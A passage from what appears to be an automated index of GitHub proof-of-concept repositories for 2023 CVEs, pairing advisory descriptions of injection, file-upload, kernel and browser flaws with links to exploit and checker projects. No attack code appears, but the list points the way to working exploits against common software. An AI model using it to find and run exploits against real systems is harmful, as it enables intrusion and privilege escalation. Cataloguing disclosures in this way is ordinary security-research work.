A possible unauthorized memory access flaw was found in the Linux kernel's cpu_entry_area mapping of X86 CPU data to memory, where a user may guess the location of exception stacks or other important data. Based on the previous CVE-2023-0597, the 'Randomize per-cpu entry area' feature was implemented in /arch/x86/mm/cpu_entry_area.c, which works through the init_cea_offsets() function when KASLR is enabled. However, despite this feature, there is still a risk of per-cpu entry area leaks. This issue could allow a local user to gain access to some important data with memory in an expected location and potentially escalate their privileges on the system.

- [pray77/CVE-2023-3640](https://github.com/pray77/CVE-2023-3640)

### CVE-2023-3710 (2023-09-12)

Improper Input Validation vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Command Injection. This issue affects PM43 versions prior to P10.19.050004. Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006).

- [vpxuser/CVE-2023-3710-POC](https://github.com/vpxuser/CVE-2023-3710-POC)

### CVE-2023-3711 (2023-09-12)

Session Fixation vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Session Credential Falsification through Prediction. This issue affects PM43 versions prior to P10.19.050004. Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006).

- [vpxuser/CVE-2023-3711-POC](https://github.com/vpxuser/CVE-2023-3711-POC)

### CVE-2023-3712 (2023-09-12)

Files or Directories Accessible to External Parties vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Privilege Escalation. This issue affects PM43 versions prior to P10.19.050004.

Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006).

- [vpxuser/CVE-2023-3712-POC](https://github.com/vpxuser/CVE-2023-3712-POC)

### CVE-2023-3824 (2023-08-11)

In PHP version 8.0.* before 8.0.30, 8.1.* before 8.1.22, and 8.2.* before 8.2.8, when loading phar file, while reading PHAR directory entries, insufficient length checking may lead to a stack buffer overflow, leading potentially to memory corruption or RCE.

- [Starla2u/CVE-2023-3824-PHP-to-RCE-LockBit-LEAK](https://github.com/Starla2u/CVE-2023-3824-PHP-to-RCE-LockBit-LEAK)
- [jhonnybonny/CVE-2023-3824](https://github.com/jhonnybonny/CVE-2023-3824)
- [baesh3r/poc-CVE-2023-3824](https://github.com/baesh3r/poc-CVE-2023-3824)

### CVE-2023-3836 (2023-07-22)

A vulnerability was discovered in Dahua Smart Park Management up to 20230713. It has been rated as critical. Affected is unknown processing of the file /emap/devicePoint_addImgIco?hasSubsystem=true. Manipulating the argument upload with unknown data can exploit an unrestricted upload vulnerability. The attack can be carried out over the network. The exploit is publicly available.

- [zh-byte/CVE-2023-3836](https://github.com/zh-byte/CVE-2023-3836)

### CVE-2023-3881 (2023-07-25)

A critical vulnerability was discovered in Campcodes Beauty Salon Management System 1.0. It concerns an unspecified function of the file /admin/forgot-password.php. Manipulating the argument contactno with unknown data can exploit an SQL injection vulnerability. The attack can be carried out over the network. The exploit is publicly available.

- [AnugiArrawwala/CVE-Research](https://github.com/AnugiArrawwala/CVE-Research)

### CVE-2023-3897 (2023-07-25)

Username enumeration is possible through Bypassing CAPTCHA in On-premise SureMDM Solution on Windows deployment allows attacker to enumerate local user information via error message.

This issue affects SureMDM On-premise: 6.31 and below version

- [jFriedli/CVE-2023-3897](https://github.com/jFriedli/CVE-2023-3897)

### CVE-2023-3971 (2023-10-04)

An HTML injection flaw was found in Controller in the user interface settings. This flaw allows an attacker to capture credentials by creating a custom login page by injecting HTML, resulting in a complete compromise.

- [ashangp923/CVE-2023-3971](https://github.com/ashangp923/CVE-2023-3971)

### CVE-2023-4128
- [Trinadh465/linux-4.1.15_CVE-2023-4128](https://github.com/Trinadh465/linux-4.1.15_CVE-2023-4128)

### CVE-2023-4145 (2023-08-03)

Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/customer-data-framework prior to 3.4.2.

- [miguelc49/CVE-2023-4145-2](https://github.com/miguelc49/CVE-2023-4145-2)
- [miguelc49/CVE-2023-4145-1](https://github.com/miguelc49/CVE-2023-4145-1)
- [miguelc49/CVE-2023-4145-3](https://github.com/miguelc49/CVE-2023-4145-3)

### CVE-2023-4165 (2023-08-05)

A critical vulnerability was found in Tongda OA. Affected is an unknown code block of the file general/system/seal_manage/iweboffice/delete_seal.php. Manipulating the argument DELETE_STR with unknown data can exploit an SQL injection vulnerability. The exploit is publicly available. Upgrading to version 11.10 fixes this issue. Applying the upgrade is the recommended remediation.

- [mvpyyds/CVE-2023-4165](https://github.com/mvpyyds/CVE-2023-4165)

### CVE-2023-4166 (2023-08-05)

A critical vulnerability was found in Tongda OA. Affected is unknown processing in the file general/system/seal_manage/dianju/delete_log.php. Manipulating the argument DELETE_STR with unknown data allows an SQL injection vulnerability to be exploited. The exploit is publicly available. Upgrading to version 11.10 fixes this issue. Applying the upgrade is the recommended mitigation.

- [mvpyyds/CVE-2023-4166](https://github.com/mvpyyds/CVE-2023-4166)

### CVE-2023-4169 (2023-08-05)

A critical vulnerability was identified in Ruijie RG-EW1200G 1.0(1)B1P5. It concerns an unknown function of the file /api/sys/set_passwd of the component Administrator Password Handler. Manipulation with unknown data allows an improper access controls vulnerability to be exploited. The attack can be carried out over the network. The exploit is publicly available.

- [thedarknessdied/CVE-2023-4169_CVE-2023-3306_CVE-2023-4415](https://github.com/thedarknessdied/CVE-2023-4169_CVE-2023-3306_CVE-2023-4415)

### CVE-2023-4174 (2023-08-06)

A vulnerability was found in mooSocial mooStore 3.1.6 and classified as problematic. It affects unknown code. Manipulation with unknown data allows a cross site scripting vulnerability to be exploited. The attack can be carried out over the network.

- [d0rb/CVE-2023-4174](https://github.com/d0rb/CVE-2023-4174)

### CVE-2023-4197 (2023-11-01)

Improper input validation in Dolibarr ERP CRM <= v18.0.1 fails to strip certain PHP code from user-supplied input when creating a Website, allowing an attacker to inject and evaluate arbitrary PHP code.

- [alien-keric/CVE-2023-4197](https://github.com/alien-keric/CVE-2023-4197)

### CVE-2023-4206 (2023-09-06)

A use-after-free vulnerability in the Linux kernel's net/sched: cls_route component can be exploited to achieve local privilege escalation.

When route4_change() is called on an existing filter, the whole tcf_result struct is always copied into the new instance of the filter. This causes a problem when updating a filter bound to a class, as tcf_unbind_filter() is always called on the old instance in the success path, decreasing filter_cnt of the still referenced class and allowing it to be deleted, leading to a use-after-free.

We recommend upgrading past commit b80b829e9e2c1b3f7aae34855e04d8f6ecaf13c8.

- [hshivhare67/Kernel_4.1.15_CVE-2023-4206_CVE-2023-4207_CVE-2023-4208](https://github.com/hshivhare67/Kernel_4.1.15_CVE-2023-4206_CVE-2023-4207_CVE-2023-4208)

### CVE-2023-4220 (2023-11-28)

Unrestricted file upload in big file upload functionality in `/main/inc/lib/javascript/bigupload/inc/bigUpload.php` in Chamilo LMS <= v1.11.24 allows unauthenticated attackers to perform stored cross-site scripting attacks and obtain remote code execution via uploading of web shell.

- [m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc](https://github.com/m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc)
- [dollarboysushil/Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220](https://github.com/dollarboysushil/Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220)
- [charlesgargasson/CVE-2023-4220](https://github.com/charlesgargasson/CVE-2023-4220)
- [insomnia-jacob/CVE-2023-4220](https://github.com/insomnia-jacob/CVE-2023-4220)
- [Ziad-Sakr/Chamilo-CVE-2023-4220-Exploit](https://github.com/Ziad-Sakr/Chamilo-CVE-2023-4220-Exploit)
- [HO4XXX/cve-2023-4220-poc](https://github.com/HO4XXX/cve-2023-4220-poc)
- [B1TC0R3/CVE-2023-4220-PoC](https://github.com/B1TC0R3/CVE-2023-4220-PoC)
- [nr4x4/CVE-2023-4220](https://github.com/nr4x4/CVE-2023-4220)
- [Al3xGD/CVE-2023-4220-Exploit](https://github.com/Al3xGD/CVE-2023-4220-Exploit)
- [charchit-subedi/chamilo-lms-unauthenticated-rce-poc](https://github.com/charchit-subedi/chamilo-lms-unauthenticated-rce-poc)
- [LGenAgul/CVE-2023-4220-Proof-of-concept](https://github.com/LGenAgul/CVE-2023-4220-Proof-of-concept)
- [VanishedPeople/CVE-2023-4220](https://github.com/VanishedPeople/CVE-2023-4220)
- [thefizzyfish/CVE-2023-4220](https://github.com/thefizzyfish/CVE-2023-4220)
- [qrxnz/CVE-2023-4220](https://github.com/qrxnz/CVE-2023-4220)
- [0x00-null/Chamilo-CVE-2023-4220-RCE-Exploit](https://github.com/0x00-null/Chamilo-CVE-2023-4220-RCE-Exploit)
- [bueno-armando/CVE-2023-4220-RCE](https://github.com/bueno-armando/CVE-2023-4220-RCE)
- [TanveerS1ngh/Chamilo-LMS-CVE-2023-4220-Exploit](https://github.com/TanveerS1ngh/Chamilo-LMS-CVE-2023-4220-Exploit)

### CVE-2023-4226 (2023-11-28)

Unrestricted file upload in `/main/inc/ajax/work.ajax.php` in Chamilo LMS <= v1.11.24 allows authenticated attackers with learner role to obtain remote code execution via uploading of PHP files.

- [krishnan-tech/CVE-2023-4226-POC](https://github.com/krishnan-tech/CVE-2023-4226-POC)

### CVE-2023-4278 (2023-09-11)

The MasterStudy LMS WordPress Plugin WordPress plugin before 3.0.18 does not have proper checks in place during registration allowing anyone to register on the site as an instructor. They can then add courses and/or posts.

- [revan-ar/CVE-2023-4278](https://github.com/revan-ar/CVE-2023-4278)

### CVE-2023-4279 (2023-09-04)

This User Activity Log WordPress plugin before 1.6.7 retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value. This may be used to hide the source of malicious traffic.

- [b0marek/CVE-2023-4279](https://github.com/b0marek/CVE-2023-4279)

### CVE-2023-4281 (2023-09-25)

This Activity Log WordPress plugin before 2.8.8 retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value. This may be used to hide the source of malicious traffic.

- [b0marek/CVE-2023-4281](https://github.com/b0marek/CVE-2023-4281)

### CVE-2023-4294 (2023-09-11)

The URL Shortify WordPress plugin before 1.7.6 does not properly escape the value of the Referer header, thus allowing an unauthenticated attacker to inject malicious JavaScript that will trigger in the plugin's admin panel showing statistics of the created short link.

- [b0marek/CVE-2023-4294](https://github.com/b0marek/CVE-2023-4294)

### CVE-2023-4357 (2023-08-15)

Insufficient validation of untrusted input in XML in Google Chrome prior to 116.0.5845.96 allowed a remote attacker to bypass file access restrictions via a crafted HTML page. (Chromium security severity: Medium)

- [xcanwin/CVE-2023-4357-Chrome-XXE](https://github.com/xcanwin/CVE-2023-4357-Chrome-XXE)
- [OgulcanUnveren/CVE-2023-4357-APT-Style-exploitation](https://github.com/OgulcanUnveren/CVE-2023-4357-APT-Style-exploitation)
- [passwa11/CVE-2023-4357-APT-Style-exploitation](https://github.com/passwa11/CVE-2023-4357-APT-Style-exploitation)
- [sunu11/chrome-CVE-2023-4357](https://github.com/sunu11/chrome-CVE-2023-4357)
- [WinnieZy/CVE-2023-4357](https://github.com/WinnieZy/CVE-2023-4357)
- [lon5948/CVE-2023-4357-Exploitation](https://github.com/lon5948/CVE-2023-4357-Exploitation)
- [CamillaFranceschini/CVE-2023-4357](https://github.com/CamillaFranceschini/CVE-2023-4357)

### CVE-2023-4427 (2023-08-22)

Out of bounds memory access in V8 in Google Chrome prior to 116.0.5845.110 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: High)

- [tianstcht/CVE-2023-4427](https://github.com/tianstcht/CVE-2023-4427)

### CVE-2023-4450 (2023-08-21)

A critical vulnerability was identified in jeecgboot JimuReport up to 1.6.0. It affects unknown functionality of the component Template Handler. Manipulation with unknown data allows an injection vulnerability to be exploited. The attack can be launched over the network. The exploit is publicly available. Upgrading to version 1.6.1 fixes this issue. Applying the upgrade is the recommended mitigation.

- [ilikeoyt/CVE-2023-4450-Attack](https://github.com/ilikeoyt/CVE-2023-4450-Attack)

### CVE-2023-4460 (2023-12-04)

The Uploading SVG, WEBP and ICO files WordPress plugin through 1.2.1 does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.

- [0xn4d/poc-cve-xss-uploading-svg](https://github.com/0xn4d/poc-cve-xss-uploading-svg)

### CVE-2023-4542 (2023-08-25)

A vulnerability was identified in D-Link DAR-8000-10 up to 20230809 and classified as critical. It concerns an unclearly defined function of the file /app/sys1.php. Manipulating the argument cmd with the input id with unknown data allows an OS command injection vulnerability to be exploited. The attack can be carried out over the network. The exploit is publicly available.

- [PumpkinBridge/CVE-2023-4542](https://github.com/PumpkinBridge/CVE-2023-4542)

### CVE-2023-4549 (2023-09-25)

The DoLogin Security WordPress plugin before 3.7 does not properly sanitize IP addresses coming from the X-Forwarded-For header, which can be used by attackers to conduct Stored XSS attacks via WordPress' login form.

- [b0marek/CVE-2023-4549](https://github.com/b0marek/CVE-2023-4549)

### CVE-2023-4568 (2023-09-13)

PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.

- [Cappricio-Securities/CVE-2023-4568](https://github.com/Cappricio-Securities/CVE-2023-4568)

### CVE-2023-4590 (2023-11-27)

Buffer overflow vulnerability in Frhed hex editor, affecting version 1.6.0. This vulnerability could allow an attacker to execute arbitrary code via a long filename argument through the Structured Exception Handler (SEH) registers.

- [dgndrn/CVE-2023-4590](https://github.com/dgndrn/CVE-2023-4590)

### CVE-2023-4596 (2023-08-30)

The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

- [E1A/CVE-2023-4596](https://github.com/E1A/CVE-2023-4596)
- [X-Projetion/CVE-2023-4596-Vulnerable-Exploit-and-Checker-Version](https://github.com/X-Projetion/CVE-2023-4596-Vulnerable-Exploit-and-Checker-Version)
- [X-Projetion/CVE-2023-4596-OpenSSH-Multi-Checker](https://github.com/X-Projetion/CVE-2023-4596-OpenSSH-Multi-Checker)

### CVE-2023-4622 (2023-09-06)

A use-after-free vulnerability in the Linux kernel's af_unix component can be exploited to achieve local privilege escalation.

The unix_stream_sendpage() function tries to add data to the last skb in the peer's recv queue without locking the queue. Thus there is a race where unix_stream_sendpage() could access an skb locklessly that is being released by garbage collection, resulting in use-after-free.

We recommend upgrading past commit 790c2f9d15b594350ae9bca7b236f2b1859de02c.

- [0range1337/CVE-CVE-2023-4622](https://github.com/0range1337/CVE-CVE-2023-4622)

### CVE-2023-4631 (2023-09-25)

The DoLogin Security WordPress plugin before 3.7 uses headers such as the X-Forwarded-For to retrieve the IP address of the request, which could lead to IP spoofing.

- [b0marek/CVE-2023-4631](https://github.com/b0marek/CVE-2023-4631)

### CVE-2023-4634 (2023-09-06)

The Media Library Assistant plugin for WordPress is vulnerable to Local File Inclusion and Remote Code Execution in versions up to, and including, 3.09. This is due to insufficient controls on file paths being supplied to the 'mla_stream_file' parameter from the ~/includes/mla-stream-image.php file, where images are processed via Imagick(). This makes it possible for unauthenticated attackers to supply files via FTP that will make directory lists, local file inclusion, and remote code execution possible.

- [Patrowl/CVE-2023-4634](https://github.com/Patrowl/CVE-2023-4634)

### CVE-2023-4636 (2023-09-05)

The WordPress File Sharing Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 2.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.

- [ThatNotEasy/CVE-2023-4636](https://github.com/ThatNotEasy/CVE-2023-4636)

### CVE-2023-4683 (2023-08-31)

NULL Pointer Dereference in GitHub repository gpac/gpac prior to 2.3-DEV.

- [Songg45/CVE-2023-4683-Test](https://github.com/Songg45/CVE-2023-4683-Test)

### CVE-2023-4696 (2023-09-01)

Improper Access Control in GitHub repository usememos/memos prior to 0.13.2.

- [mnqazi/CVE-2023-4696](https://github.com/mnqazi/CVE-2023-4696)

### CVE-2023-4698 (2023-09-01)

Improper Input Validation in GitHub repository usememos/memos prior to 0.13.2.

- [mnqazi/CVE-2023-4698](https://github.com/mnqazi/CVE-2023-4698)

### CVE-2023-4699 (2023-11-06)

Insufficient Verification of Data Authenticity vulnerability in Mitsubishi Electric Corporation MELSEC-F Series main modules and MELSEC iQ-F Series CPU modules allows a remote unauthenticated attacker to reset the memory of the products to factory default state and cause denial-of-service (DoS) condition on the products by sending specific packets.

- [Scottzxor/Citrix-Bleed-Buffer-Overread-Demo](https://github.com/Scottzxor/Citrix-Bleed-Buffer-Overread-Demo)

### CVE-2023-4741 (2023-09-03)

A critical vulnerability was found in IBOS OA 4.5.5. It concerns an unknown function of the file ?r=diary/default/del of the component Delete Logs Handler. Manipulation with unknown data allows an SQL injection vulnerability to be exploited. The attack can be carried out over the network. The exploit is publicly available.

- [wudidike/CVE-2023-4741](https://github.com/wudidike/CVE-2023-4741)

### CVE-2023-4762 (2023-09-05)

Type Confusion in V8 in Google Chrome prior to 116.0.5845.179 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High)

- [buptsb/CVE-2023-4762](https://github.com/buptsb/CVE-2023-4762)
- [sherlocksecurity/CVE-2023-4762-Code-Review](https://github.com/sherlocksecurity/CVE-2023-4762-Code-Review)

### CVE-2023-4771 (2023-11-16)

A Cross-Site Scripting vulnerability has been found in CKSource CKEditor affecting versions 4.15.1 and earlier. An attacker could send malicious JavaScript code through the /ckeditor/samples/old/ajax.html file and retrieve an authorized user's information.

- [sahar042/CVE-2023-4771](https://github.com/sahar042/CVE-2023-4771)

### CVE-2023-4800 (2023-10-16)

The DoLogin Security WordPress plugin before 3.7.1 does not restrict the access of a widget that shows the IPs of failed logins to low privileged users.

- [b0marek/CVE-2023-4800](https://github.com/b0marek/CVE-2023-4800)

### CVE-2023-4813 (2023-09-12)

A flaw was found in glibc. In an uncommon situation, the gaih_inet function may use memory that has been freed, resulting in an application crash. This issue is only exploitable when the getaddrinfo function is called and the hosts database in /etc/nsswitch.conf is configured with SUCCESS=continue or SUCCESS=merge.

- [tnishiox/cve-2023-4813](https://github.com/tnishiox/cve-2023-4813)

### CVE-2023-4863 (2023-09-12)

Heap buffer overflow in libwebp in Google Chrome prior to 116.0.5845.187 and libwebp 1.3.2 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: Critical)

- [mistymntncop/CVE-2023-4863](https://github.com/mistymntncop/CVE-2023-4863)
- [bbaranoff/CVE-2023-4863](https://github.com/bbaranoff/CVE-2023-4863)
- [talbeerysec/BAD-WEBP-CVE-2023-4863](https://github.com/talbeerysec/BAD-WEBP-CVE-2023-4863)
- [OITApps/Find-VulnerableElectronVersion](https://github.com/OITApps/Find-VulnerableElectronVersion)
- [GTGalaxi/ElectronVulnerableVersion](https://github.com/GTGalaxi/ElectronVulnerableVersion)
- [murphysecurity/libwebp-checker](https://github.com/murphysecurity/libwebp-checker)
- [huiwen-yayaya/CVE-2023-4863](https://github.com/huiwen-yayaya/CVE-2023-4863)
- [LiveOverflow/webp-CVE-2023-4863](https://github.com/LiveOverflow/webp-CVE-2023-4863)
- [caoweiquan322/NotEnough](https://github.com/caoweiquan322/NotEnough)
- [CrackerCat/CVE-2023-4863-](https://github.com/CrackerCat/CVE-2023-4863-)
- [sarsaeroth/CVE-2023-4863-POC](https://github.com/sarsaeroth/CVE-2023-4863-POC)

### CVE-2023-4911 (2023-10-03)

A buffer overflow was discovered in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES environment variable. This issue could allow a local attacker to use maliciously crafted GLIBC_TUNABLES environment variables when launching binaries with SUID permission to execute code with elevated privileges.

- [Green-Avocado/CVE-2023-4911](https://github.com/Green-Avocado/CVE-2023-4911)
- [leesh3288/CVE-2023-4911](https://github.com/leesh3288/CVE-2023-4911)
- [RickdeJager/CVE-2023-4911](https://github.com/RickdeJager/CVE-2023-4911)
- [xiaoQ1z/CVE-2023-4911](https://github.com/xiaoQ1z/CVE-2023-4911)
- [silent6trinity/looney-tuneables](https://github.com/silent6trinity/looney-tuneables)
- [hadrian3689/looney-tunables-CVE-2023-4911](https://github.com/hadrian3689/looney-tunables-CVE-2023-4911)
- [ruycr4ft/CVE-2023-4911](https://github.com/ruycr4ft/CVE-2023-4911)
- [guffre/CVE-2023-4911](https://github.com/guffre/CVE-2023-4911)
- [chaudharyarjun/LooneyPwner](https://github.com/chaudharyarjun/LooneyPwner)
- [KernelKrise/CVE-2023-4911](https://github.com/KernelKrise/CVE-2023-4911)
- [Diego-AltF4/CVE-2023-4911](https://github.com/Diego-AltF4/CVE-2023-4911)
- [teraGL/looneyCVE](https://github.com/teraGL/looneyCVE)
- [snurkeburk/Looney-Tunables](https://github.com/snurkeburk/Looney-Tunables)
- [puckiestyle/CVE-2023-4911](https://github.com/puckiestyle/CVE-2023-4911)
- [yanfernandess/Looney-Tunables-CVE-2023-4911](https://github.com/yanfernandess/Looney-Tunables-CVE-2023-4911)
- [NishanthAnand21/CVE-2023-4911-PoC](https://github.com/NishanthAnand21/CVE-2023-4911-PoC)

### CVE-2023-4966 (2023-10-10)

Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server.

- [Chocapikk/CVE-2023-4966](https://github.com/Chocapikk/CVE-2023-4966)
- [dinosn/citrix_cve-2023-4966](https://github.com/dinosn/citrix_cve-2023-4966)
- [senpaisamp/Netscaler-CVE-2023-4966-POC](https://github.com/senpaisamp/Netscaler-CVE-2023-4966-POC)
- [mlynchcogent/CVE-2023-4966-POC](https://github.com/mlynchcogent/CVE-2023-4966-POC)
- [IceBreakerCode/CVE-2023-4966](https://github.com/IceBreakerCode/CVE-2023-4966)
- [0xKayala/CVE-2023-4966](https://github.com/0xKayala/CVE-2023-4966)
- [certat/citrix-logchecker](https://github.com/certat/citrix-logchecker)
- [RevoltSecurities/CVE-2023-4966](https://github.com/RevoltSecurities/CVE-2023-4966)
- [s-bt/CVE-2023-4966](https://github.com/s-bt/CVE-2023-4966)
- [byte4RR4Y/CVE-2023-4966](https://github.com/byte4RR4Y/CVE-2023-4966)
- [jmussmann/cve-2023-4966-iocs](https://github.com/jmussmann/cve-2023-4966-iocs)
- [morganwdavis/overread](https://github.com/morganwdavis/overread)
- [LucasOneZ/CVE-2023-4966](https://github.com/LucasOneZ/CVE-2023-4966)

### CVE-2023-5024 (2023-09-17)

A vulnerability was identified in Planno 23.04.04 and classified as problematic. It affects an unknown function of the component Comment Handler. Manipulation with unknown data allows a cross site scripting vulnerability to be exploited. The attack can be carried out over the network. The exploit is publicly available.

- [PH03N1XSP/CVE-2023-5024](https://github.com/PH03N1XSP/CVE-2023-5024)

### CVE-2023-5043 (2023-10-25)

Ingress nginx annotation injection causes arbitrary command execution.

- [r0binak/CVE-2023-5043](https://github.com/r0binak/CVE-2023-5043)

### CVE-2023-5044 (2023-10-25)

Code injection via nginx.ingress.kubernetes.io/permanent-redirect annotation.

- [r0binak/CVE-2023-5044](https://github.com/r0binak/CVE-2023-5044)
- [4ARMED/cve-2023-5044](https://github.com/4ARMED/cve-2023-5044)
- [KubernetesBachelor/CVE-2023-5044](https://github.com/KubernetesBachelor/CVE-2023-5044)

### CVE-2023-5070 (2023-10-20)

The Social Media Share Buttons & Social Sharing Icons plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 2.8.5 via the sfsi_save_export function. This can allow subscribers to export plugin settings that include social media authentication tokens and secrets as well as app passwords.

- [RandomRobbieBF/CVE-2023-5070](https://github.com/RandomRobbieBF/CVE-2023-5070)

### CVE-2023-5089 (2023-10-16)

The Defender Security WordPress plugin before 4.1.0 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the login page, even when the hide login page functionality of the plugin is enabled.

- [Cappricio-Securities/CVE-2023-5089](https://github.com/Cappricio-Securities/CVE-2023-5089)

### CVE-2023-5142 (2023-09-24)

A vulnerability was discovered in H3C GR-1100-P, GR-1108-P, GR-1200W, GR-1800AX, GR-2200, GR-3200, GR-5200, GR-8300, ER2100n, ER2200G2, ER3200G2, ER3260G2, ER5100G2, ER5200G2 and ER6300G2 up to 20230908 and classified as problematic. It concerns an unknown function of the file /userLogin.asp of the component Config File Handler. Manipulation with unknown data allows a path traversal vulnerability to be exploited. The attack can be carried out over the network. The complexity of an attack is rather high and exploitation is considered difficult. The exploit is publicly available.

- [kuangxiaotu/CVE-H3C-Report](https://github.com/kuangxiaotu/CVE-H3C-Report)

### CVE-2023-5178 (2023-11-01)

A use-after-free vulnerability was found in `drivers/nvme/target/tcp.c` in `nvmet_tcp_free_crypto` due to a logical bug in the NVMe/TCP subsystem in the Linux kernel. This issue may allow a malicious user to cause a use-after-free and double-free problem, which may permit remote code execution or lead to local privilege escalation.

- [rockrid3r/CVE-2023-5178](https://github.com/rockrid3r/CVE-2023-5178)

### CVE-2023-5204 (2023-10-19)

The ChatBot plugin for WordPress is vulnerable to SQL Injection via the $strid parameter in versions up to, and including, 4.8.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

- [RandomRobbieBF/CVE-2023-5204](https://github.com/RandomRobbieBF/CVE-2023-5204)

### CVE-2023-5217 (2023-09-28)

Heap buffer overflow in vp8 encoding in libvpx in Google Chrome prior to 117.0.5938.132 and libvpx 1.13.1 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

- [UT-Security/cve-2023-5217-poc](https://github.com/UT-Security/cve-2023-5217-poc)
- [Trinadh465/platform_external_libvpx_v1.8.0_CVE-2023-5217](https://github.com/Trinadh465/platform_external_libvpx_v1.8.0_CVE-2023-5217)
- [Trinadh465/platform_external_libvpx_v1.4.0_CVE-2023-5217](https://github.com/Trinadh465/platform_external_libvpx_v1.4.0_CVE-2023-5217)

### CVE-2023-5324 (2023-10-01)

A critical vulnerability was found in eeroOS up to 6.16.4-11. It affects unknown code of the component Ethernet Interface. Manipulation with unknown data allows a denial of service vulnerability to be exploited. The attack can be carried out within the local network. The exploit is publicly available.

- [nomis/eero-zero-length-ipv6-options-header-dos](https://github.com/nomis/eero-zero-length-ipv6-options-header-dos)

### CVE-2023-5360 (2023-10-31)

The Royal Elementor Addons and Templates WordPress plugin before 1.3.79 does not properly validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as PHP files, and achieve RCE.

- [sagsooz/CVE-2023-5360](https://github.com/sagsooz/CVE-2023-5360)
- [phankz/Worpress-CVE-2023-5360](https://github.com/phankz/Worpress-CVE-2023-5360)
- [nastar-id/CVE-2023-5360](https://github.com/nastar-id/CVE-2023-5360)
- [Chocapikk/CVE-2023-5360](https://github.com/Chocapikk/CVE-2023-5360)
- [tucommenceapousser/CVE-2023-5360](https://github.com/tucommenceapousser/CVE-2023-5360)
- [Jenderal92/WP-CVE-2023-5360](https://github.com/Jenderal92/WP-CVE-2023-5360)
- [Pushkarup/CVE-2023-5360](https://github.com/Pushkarup/CVE-2023-5360)
- [angkerithhack001/CVE-2023-5360-PoC](https://github.com/angkerithhack001/CVE-2023-5360-PoC)

### CVE-2023-5412 (2023-10-31)

The Image horizontal reel scroll slideshow plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 13.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

- [RandomRobbieBF/CVE-2023-5412](https://github.com/RandomRobbieBF/CVE-2023-5412)

### CVE-2023-5521 (2023-10-11)

Incorrect Authorization in GitHub repository tiann/kernelsu prior to v0.6.9.

- [Ylarod/CVE-2023-5521](https://github.com/Ylarod/CVE-2023-5521)

### CVE-2023-5538 (2023-10-18)

The MpOperationLogs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the IP Request Headers in versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

- [juweihuitao/MpOperationLogs](https://github.com/juweihuitao/MpOperationLogs)

### CVE-2023-5539 (2023-11-09)

A remote code execution risk was identified in the Lesson activity. By default this was only available to teachers and managers.

- [cli-ish/CVE-2023-5539](https://github.com/cli-ish/CVE-2023-5539)

### CVE-2023-5540 (2023-11-09)

A remote code execution risk was identified in the IMSCP activity. By default this was only available to teachers and managers.

- [cli-ish/CVE-2023-5540](https://github.com/cli-ish/CVE-2023-5540)

### CVE-2023-5546 (2023-11-09)

ID numbers displayed in the quiz grading report required additional sanitizing to prevent a stored XSS risk.

- [obelia01/CVE-2023-5546](https://github.com/obelia01/CVE-2023-5546)

### CVE-2023-5561 (2023-10-16)

WordPress does not properly restrict which user fields are searchable via the REST API, allowing unauthenticated attackers to discern the email addresses of users who have published public posts on an affected website via an oracle-style attack.

- [pog007/CVE-2023-5561-PoC](https://github.com/pog007/CVE-2023-5561-PoC)

### CVE-2023-5717 (2023-10-25)

A heap out-of-bounds write vulnerability in the Linux kernel's Linux Kernel Performance Events (perf) component can be exploited to achieve local privilege escalation.

If perf_read_group() is called while an event's sibling_list is smaller than its child's sibling_list, it can increment or write to memory locations outside of the allocated buffer.

We recommend upgrading past commit 32671e3799ca2e4590773fd0e63aaa4229e50c06.

- [uthrasri/CVE-2023-5717](https://github.com/uthrasri/CVE-2023-5717)

### CVE-2023-5720 (2023-11-15)

A flaw was found in Quarkus, where it does not properly sanitize artifacts created using the Gradle plugin, allowing certain build system information to remain. This flaw allows an attacker to access potentially sensitive information from the build system within the application.

